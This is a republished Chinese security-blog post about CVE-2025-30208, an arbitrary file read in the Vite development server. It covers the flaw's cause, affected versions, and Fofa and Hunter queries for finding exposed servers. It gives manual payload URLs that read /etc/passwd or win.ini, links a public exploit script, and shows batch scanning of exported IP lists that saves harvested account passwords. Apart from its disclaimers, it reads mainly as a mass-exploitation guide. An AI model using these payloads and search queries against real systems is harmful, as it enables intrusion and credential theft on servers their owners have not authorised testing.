声明!本公众号及团队所做的文章及工具分享仅仅只是供大家学习交流为主,切勿用于非法用途,如有任何触犯法律的行为,均与本人及团队无关!!!
漏洞信息
CVE-2025-30208是Vite开发服务器中存在的一个高危逻辑漏洞,允许攻击者通过构造特殊的URL绕过文件访问限制,读取服务器上的任意文件(如配置文件、密钥、数据库凭据等)。该漏洞的利用条件需满足两点:开发服务器通过--host或server.host配置暴露至网络(非默认配置),且使用受影响版本的Vite由于Vite广泛应用于Vue、React等主流前端框架,潜在影响范围涉及数十万级资产。
漏洞原理
漏洞源于Vite在处理URL查询参数时的逻辑缺陷。当请求路径包含特定参数(如?raw??或?import&raw??)时,Vite对URL尾部分隔符(如?和&)的正则匹配不严格,导致安全检查被绕过。例如,攻击者可构造类似/@fs/etc/passwd?raw??的请求,利用@fs机制(本用于访问项目允许列表内的文件)读取系统敏感文件官方修复方案通过正则表达式/[?&]+$/移除URL末尾的冗余分隔符,从而阻断绕过路径。
漏洞特征
-
Fofa测绘语句:
body="/@vite/client"
-
鹰图Hunter测绘语句:
web.body="/@vite/client"
影响范围
-
6.2.0 <= Vite <= 6.2.2 -
6.1.0 <= Vite <= 6.1.1 -
6.0.0 <= Vite <= 6.0.11 -
5.0.0 <= Vite <= 5.4.14 -
Vite <= 4.5.9
漏洞复现
手工复现
Linux下
windwos下
http://目标IP:端口/@fs/c://windows/win.ini?import&raw??
poc复现
POC开源网站:也可以回台回复CVE-2025-30208获取
https://github.com/ThumpBo/CVE-2025-30208-EXP
对单个网站利用
这里可以使用-f指定多个ip扫描,比如利用fofa特征拿到的ip资产,导出后进行扫描
python exp.py -f ip.txt
扫描结果将会匹配到的账号密码保存在 output.txt 中,其中 IP.txt 格式为 http://[ip]/[domain],一行一个
原文始发于微信公众号(泷羽Sec-track):CVE-2025-30208-Vite任意文件读取漏洞服批量漏洞扫描
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论